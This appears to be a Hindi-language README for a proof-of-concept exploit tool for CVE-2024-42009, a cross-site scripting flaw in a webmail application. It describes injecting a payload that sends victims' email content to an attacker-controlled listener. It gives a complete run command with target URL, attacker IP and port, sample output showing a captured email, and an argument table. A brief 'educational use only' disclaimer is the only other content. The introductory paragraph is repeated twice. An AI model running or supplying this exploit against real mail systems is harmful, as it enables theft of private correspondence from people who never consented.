
यह प्रूफ ऑफ कॉन्सेप्ट (PoC) CVE-2024-42009 के लिए एक एक्सप्लॉइट प्रदर्शित करता है, जो लक्षित वेबमेल एप्लिकेशन से ईमेल निकालने के लिए क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता का लाभ उठाता है। यह हमला एक दुर्भावनापूर्ण पेलोड इंजेक्ट करता है जो ईमेल सामग्री को हमलावर-नियंत्रित लिसनर तक बाहर निकालता है।
यह प्रूफ ऑफ कॉन्सेप्ट (PoC) CVE-2024-42009 के लिए एक एक्सप्लॉइट प्रदर्शित करता है, जो एक क्रॉस-साइट स्क्रिप्टिंग (XSS) कमजोरी का उपयोग करके लक्ष्य वेबमेल एप्लिकेशन से ईमेल निकालता है। हमला एक दुर्भावनापूर्ण पेलोड इंजेक्ट करता है जो ईमेल सामग्री को हमलावर-नियंत्रित लिसनर तक पहुंचाता है।
pip install requests beautifulsoup4
आवश्यक तर्कों के साथ स्क्रिप्ट चलाएँ:
python exploit.py -fu [email protected] -tu [email protected] -u http://target.com/contact -ip YOUR_IP -p 1337
[*] CVE-2024-42009 PoC: Listening on 192.168.1.100:1337...
[*] Sending payload for UID 1...
[+] Payload sent for UID 1 (Status: 200)
[+] Captured Email Content:
Hello, this is a test email!
मैं इस GitHub रिपॉजिटरी में होस्ट की गई कमजोरी और सभी संबंधित एक्सप्लॉइट के क्रेडिट/स्वामित्व/प्रकटीकरण का दावा नहीं करता - सभी क्रेडिट उस शोधकर्ता को जाते हैं जिसने इसे खोजा; मैंने केवल इंटरनेट से डेटा के आधार पर कमजोरी को दोहराने के लिए एक POC बनाया। यह PoC केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए है। सहमति के बिना सिस्टम के विरुद्ध अनधिकृत परीक्षण अवैध है। जिम्मेदारी से उपयोग करें!
| Argument | Description |
|---|
-fu, --from-user | प्रेषक का ईमेल पता |
-tu, --to-user | प्राप्तकर्ता का ईमेल पता |
-u, --target-url | लक्ष्य वेबमेल URL |
-ip, --server-ip | हमलावर के लिसनर का IP पता |
-p, --server-port | लिसनर के लिए पोर्ट (डिफ़ॉल्ट: 1337) |